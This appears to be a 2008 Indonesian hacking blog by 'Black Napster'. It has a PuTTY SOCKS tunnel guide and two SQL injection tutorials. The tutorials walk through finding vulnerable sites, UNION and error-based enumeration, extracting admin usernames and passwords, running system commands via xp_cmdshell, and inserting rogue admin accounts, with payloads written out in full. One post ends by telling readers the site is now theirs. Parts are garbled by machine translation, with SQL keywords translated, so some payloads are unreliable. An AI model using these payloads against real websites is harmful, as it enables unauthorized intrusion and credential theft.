SSH Tunneling - Socks4

Tutorial ini ditujukan untuk orang dengan aman shell akses yang ingin menggunakan ini untuk menggunakan koneksi ssh sebagai Socks4 dapat diandalkan.
Hal ini tidak pada UID atau apapun, dapat terbatas, akar .. apa yang selama ini adalah sambungan SSH ke server.

Apa yang anda perlu

SSH akses pada server.
Putty

Start up Putty dan jenis sambungan dalam info. Nama host dan port seperti biasa.

Setelah itu dilakukan, tidak memulai sambungan. Lihat bawah menu di sisi kiri, dan kemudian klik pada SSH dalam: terowongan

Sekarang di bawah kotak tujuan, menandakan kotak centang 'Dynamic' dan meninggalkan kotak di bawah ini ditetapkan sebagai Otomatis

Sekarang lihat di atas dan di kotak disebut port sumber, tipe 1080. Setelah ini dilakukan tekan menambahkan.

Sekarang Anda akan menghubungkan ke ini biasanya SSH server dan LOGIN seperti biasa.

Setelah Anda login di kaus kaki proxy adalah! socks4 yang tetap sampai selama ssh sambungan aktif.

Sekarang di app pilihan anda misalnya FireFox; menambahkan kaus kaki 4 proxy. Tambahkan nama host localhost dan port 1080.

Anda sekarang berselancar aman melalui sambungan daripada server Anda sendiri.

Ke myip.dk dan anda akan melihat IP server bukan Anda sendiri;]

Menikmati.

Sunday, December 21, 2008

Posted by Black Napster at 11:11 PM 0 comments  

Pengertian sql injection

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--


contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda...



Untuk Lebih Jelas Bisa Download Video Tutorial Ini Beserta File MySQL Injection

http://www.freewebs.com/suk3t1r3ng/mainfile.php

anda langsung jalankan file " SQL Injection.html "

Posted by Black Napster at 11:03 PM 0 comments  

Apa itu Putty

putty itu software kecil untuk melakukan remote ke suatu server (komputer) yang membuka port 21 (telnet), port (22) SSH, dsb.
Telnet itu service yang dijalankan suatu komputer melalui port 21. Telnet bisa dilakukan dan menghubungi baik mesin windows ataupun unix/linux.
Intinya asal ada service telnet-nya dan dibuka, maka komputer itu (windows or non windows) bisa di telnet melalui komputer lain (windows or non windows). Bisa melalui perintah 'telnet' di command windows atau linux/unix, atau menggunakan software seperti putti, qvt-term, dsb

Posted by Black Napster at 6:15 PM 0 comments  

Sql injection

Apa itu SQL Injection

Ketika sebuah mesin hanya memiliki port 80 dibuka, anda akan melihat kelemahan sebuah system, dan Anda tahu bahwa admin selalu mem patch server, SQL injeksi adalah salah satu jenis serangan web hacking yang sering terjadi dan berjalan pada port 80 dan akan bekerja sekalipun admin sudah mempatch system nya,Ini serangan pada aplikasi web (seperti ASP, JSP, PHP, CGI, dll)dan perlu di ingat para Hacker akan dengan sabar mencari setiap kelemahan web target yang di ingin kan.

Artikel ini tidak memperkenalkan sesuatu yang baru, SQL Injection telah ditulis secara luas dan digunakan di luar,saya akan memberikan gambaran dan sedikit penjelasan tentang teknik SQL Injection yang sering terjadi saat-saat ini

1,1 Injeksi SQL Apa itu?

SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.
SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu “suntikan”. Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.
Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.
Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.

1,2 Apa yang anda perlu kan?..

Web browser.

2,0 Apa yang harus Anda cari?

Cobalah untuk mencari halaman yang memungkinkan Anda untuk mengirimkan data, yaitu: halaman login, halaman pencarian, umpan balik, dll Kadang-kadang, halaman HTML menggunakan perintah POSTING untuk mengirim parameter ke halaman ASP lain. Oleh karena itu, Anda mungkin tidak melihat parameter dalam URL. Namun, Anda dapat memeriksa kode sumber dari HTML, dan mencari "FORM" tag pada kode HTML. Anda dapat menemukan sesuatu seperti ini dalam beberapa kode HTML:

Semuanya antara dan memiliki potensi parameter yang mungkin berguna (mengeksploitasi bijaksana).

2,1 Bagaimana jika Anda tidak dapat menemukan halaman yang mengambil masukan?

Anda harus mencari halaman seperti ASP, JSP, CGI, atau PHP halaman web. Coba lihat khususnya untuk URL yang mengambil parameter, seperti:

http://duck/index.asp?id=10

3,0 Bagaimana jika Anda uji itu rentan?
Mulai dengan satu kutipan menipu. Input seperti:

hi 'atau 1 = 1 --

Menjadi login, atau password, atau bahkan dalam URL. Contoh:
- Login: hi 'atau 1 = 1 --
- Pass: hi 'atau 1 = 1 --
- Http://duck/index.asp?id=hi 'atau 1 = 1 --

Jika Anda harus melakukannya dengan disembunyikan lapangan, hanya mendownload dari sumber HTML situs, menyimpannya dalam hard disk, memodifikasi URL dan disembunyikan bidang yang sesuai. Contoh:

Jika Anda beruntung adalah pada sisi, Anda akan mendapatkan login tanpa nama login atau password.

3,1 Tetapi mengapa 'atau 1 = 1 -?
Mari kita lihat contoh lain mengapa 'atau 1 = 1 - adalah penting. Selain melangkahi login, anda juga dapat melihat informasi tambahan yang biasanya tidak tersedia. Mengambil ASP halaman yang akan Anda link ke halaman lain dengan URL berikut:

http://duck/index.asp?category=food

Dalam URL, 'kategori' adalah nama variabel, dan 'makanan' adalah nilai yang ditetapkan untuk variabel. Untuk melakukan itu, sebuah ASP mungkin berisi kode berikut (OK, ini adalah kode aktual yang kami buat untuk latihan ini):

v_cat = permintaan ( "kategori")
sqlstr = "SELECT * FROM produk DIMANA PCategory = '" & v_cat & "'"
= mengatur conn.execute rs (sqlstr)

Sebagaimana yang bisa kita lihat, variabel kami akan dibungkus ke v_cat dan karena itu harus menjadi pernyataan SQL:

SELECT * FROM produk DIMANA PCategory = 'makanan'

Permintaan harus kembali resultset yang berisi satu atau lebih baris yang sesuai dengan kondisi DIMANA, dalam hal ini, 'makanan'.

Sekarang, kami menganggap bahwa mengubah URL ke sesuatu seperti ini:

http://duck/index.asp?category=food 'atau 1 = 1 --

Sekarang, kami sama dengan variabel v_cat untuk "makanan 'atau 1 = 1 -", jika kita ganti ini dalam SQL permintaan, kami akan memiliki:

SELECT * FROM produk DIMANA PCategory = 'makanan' atau 1 = 1 - '

Permintaan sekarang sekarang harus memilih semuanya dari produk tanpa tabel jika PCategory sama dengan 'makanan' atau tidak. A double dash "-" kirim MS SQL server mengabaikan sisanya dari permintaan, yang akan menyingkirkan terakhir gantung kutipan tunggal ( '). Kadang-kadang, masih dapat dibuat untuk mengganti dengan dua tanda garis tunggal hash "#".

Namun, jika ia bukan SQL server, atau Anda tidak hanya dapat mengabaikan sisanya dari permintaan, Anda juga dapat mencoba

'Atau' a '=' a

SQL permintaan sekarang akan menjadi:

SELECT * FROM produk DIMANA PCategory = 'makanan' atau 'a' = 'a'

Perlu kembali hasil yang sama.

Tergantung pada sebenarnya Permintaan SQL, Anda mungkin harus mencoba beberapa kemungkinan:

'Atau 1 = 1 --
"Atau 1 = 1 --
atau 1 = 1 --
'Atau' a '=' a
"Atau" a "=" a
') Atau (' a '=' a

4,0 Bagaimana cara mendapatkan jauh eksekusi dengan suntikan SQL?
Kemampuan untuk memajukan perintah SQL biasanya berarti, kami dapat melakukan apapun di SQL permintaan akan. Default instalasi MS SQL Server berjalan sebagai SISTEM, yang setara dengan akses Administrator pada Windows. Kami dapat menggunakan prosedur yang tersimpan seperti master .. xp_cmdshell jauh untuk melakukan eksekusi:

'; Exec master .. xp_cmdshell' ping 10.10.1.2 '--

Coba menggunakan kutipan ganda ( ") jika kutipan tunggal ( ') tidak bekerja.

Semi usus akan mengakhiri Permintaan SQL dan saat ini sehingga memungkinkan Anda untuk memulai perintah SQL baru. Untuk memastikan bahwa perintah berhasil dijalankan, Anda dapat mendengarkan paket ICMP dari 10.10.1.2, memeriksa apakah ada paket dari server:

# tcpdump ICMP

Jika anda tidak mendapatkan permintaan dari ping setiap server, dan mendapatkan pesan kesalahan menunjukkan izin kesalahan, ada kemungkinan bahwa administrator memiliki keterbatasan akses untuk Pengguna Web ini disimpan prosedur.

5,0 Bagaimana untuk mendapatkan hasil pencarian SQL saya?
Dimungkinkan untuk sp_makewebtask digunakan untuk menulis permintaan Anda ke dalam HTML:

'; EXEC master .. sp_makewebtask "\ \ 10.10.1.3 \ share \ output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Tetapi target IP harus ada folder "yang di share" Setiap orang untuk berbagi.

6,0 Bagaimana untuk mendapatkan data dari database menggunakan ODBC pesan kesalahan
Kami dapat menggunakan informasi dari pesan error yang dihasilkan oleh MS SQL Server untuk mendapatkan hampir semua data yang kita inginkan. Ambil contoh untuk halaman berikut:

http://duck/index.asp?id=10

Kami akan mencoba untuk UNI bilangan'10 'dengan string lain dari database:

http://duck/index.asp?id=10 UNI SELECT TOP 1 TABLE_NAME DARI INFORMATION_SCHEMA.TABLES---

Sistem INFORMATION_SCHEMA.TABLES tabel berisi informasi dari semua tabel di server. TABLE_NAME lapangan yang jelas berisi nama dari setiap tabel dalam database. Ia telah dipilih karena kita tahu selalu ada. Permintaan kami:

Pilih top 1 TABLE_NAME dari INFORMATION_SCHEMA.TABLES -

Ini harus kembali pertama nama tabel dalam database. Saat ini kami UNI nilai string ke integer 10, MS SQL Server akan mencoba untuk mengkonversi string (nvarchar) untuk sebuah integer. Ini akan menghasilkan kesalahan, karena kami tidak dapat dikonversi ke int nvarchar. Server akan menampilkan error berikut:

Microsoft OLE DB Provider untuk ODBC Driver kesalahan'80040e07 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Sintaks kesalahan mengubah nvarchar value 'table1' ke kolom data jenis int.
/ index.asp, baris 5

Pesan kesalahan yang cukup bagus untuk memberi tahu kami nilai yang tidak dapat dikonversi ke dalam integer. Dalam hal ini, kami telah diperoleh pertama nama tabel dalam database, yang "table1".

Untuk mendapatkan nama tabel berikutnya, kita dapat menggunakan query berikut:

http://duck/index.asp?id=10 UNI SELECT TOP 1 TABLE_NAME DARI INFORMATION_SCHEMA.TABLES DIMANA TABLE_NAME TIDAK DI ( 'table1') --

Kami juga dapat mencari data mahu menggunakan kata kunci:

http://duck/index.asp?id=10 UNI SELECT TOP 1 TABLE_NAME DARI INFORMATION_SCHEMA.TABLES DIMANA TABLE_NAME mahu '% 25login% 25' --
Output:
Microsoft OLE DB Provider untuk ODBC Driver kesalahan'80040e07 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Sintaks kesalahan mengubah nilai nvarchar 'admin_login' ke kolom data jenis int.
/ index.asp, baris 5

Paten yang cocok, '% 25% 25login' akan dipandang sebagai% login% pada SQL Server. Dalam hal ini, kami akan mendapatkan tabel pertama nama yang sesuai dengan kriteria, "admin_login".

6,1 Bagaimana untuk tambang semua kolom nama tabel?
Kami dapat menggunakan tabel INFORMATION_SCHEMA.COLUMNS lain berguna untuk merencanakan semua kolom nama tabel:

http://duck/index.asp?id=10 UNI SELECT TOP 1 COLUMN_NAME DARI INFORMATION_SCHEMA.COLUMNS DIMANA TABLE_NAME = 'admin_login' --

Output:

Microsoft OLE DB Provider untuk ODBC Driver kesalahan'80040e07 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Sintaks kesalahan mengubah nilai nvarchar 'login_id' ke kolom data jenis int.
/ index.asp, baris 5

Sekarang kami memiliki nama kolom pertama, kita dapat menggunakan TIDAK DI () untuk mendapatkan nama kolom berikutnya:

http://duck/index.asp?id=10 UNI SELECT TOP 1 COLUMN_NAME DARI INFORMATION_SCHEMA.COLUMNS DIMANA TABLE_NAME = 'admin_login' DIMANA COLUMN_NAME TIDAK DI ( 'login_id') --

Output:

Microsoft OLE DB Provider untuk ODBC Driver kesalahan'80040e07 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Sintaks kesalahan mengubah nilai nvarchar 'login_name' ke kolom data jenis int.
/ index.asp, baris 5

Ketika kami melanjutkan lebih lanjut, kami diperoleh sisa dari kolom nama, yaitu "password", "rincian". Kita tahu saat ini kami mendapatkan pesan error berikut:

http://duck/index.asp?id=10 UNI SELECT TOP 1 COLUMN_NAME DARI INFORMATION_SCHEMA.COLUMNS DIMANA TABLE_NAME = 'admin_login' DIMANA COLUMN_NAME TIDAK DI ( 'login_id', 'login_name', 'password', rincian ') --

Output:

Microsoft OLE DB Provider untuk ODBC Driver kesalahan'80040e14 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] ORDER BY item harus muncul dalam daftar pilih jika pernyataan berisi UNI operator.
/ index.asp, baris 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get numeric string value?

There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.


7,0 Bagaimana untuk mengubah / memasukkan data ke dalam database?
Ketika kami berhasil mengumpulkan semua kolom nama meja, ada kemungkinan bagi kami untuk UPDATE atau bahkan INSERT rekod baru dalam tabel. Misalnya, untuk mengubah password untuk "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' DIMANA login_name = 'neo' --

Untuk merekam INSERT baru ke dalam database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ( 'login_id', 'login_name', 'password', 'detail') VALUES (666, 'neo2', 'newpas5', 'NA ') --

Kami sekarang dapat login sebagai "neo2" dengan sandi "newpas5".

8,0 Bagaimana untuk menghindari SQL Injeksi?
Memfilter karakter tunggal seperti kutipan, kutipan ganda, garis miring, garis miring kembali, semi usus, diperpanjang karakter seperti NULL, membawa kembali, baris baru, dll, di semua string dari:
- Masukan dari pengguna
- Parameter dari URL
- Nilai dari cookie

Untuk nilai numerik, dikonversi ke sebuah integer sebelum parsing ke SQL
Atau menggunakan ISNUMERIC untuk memastikan apakah merupakan integer.

Ubah "Startup dan menjalankan SQL Server" menggunakan hak istimewa rendah pengguna dalam SQL Server Security tab.

Hapus disimpan prosedur yang tidak menggunakan seperti:

master .. Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

9,0 Dimana saya bisa mendapatkan info lebih?

http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

Yang baik ringkasan Injeksi SQL pada SQL Server yang share
http://www.owasp.org/asac/input_validation/sql.shtml

Senseport buat membaca Injeksi SQL:
http://www.sensepost.com/misc/SQLinsertion.htm

Bacaan Lain nya:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

Tuesday, December 2, 2008

Posted by Black Napster at 10:12 AM 0 comments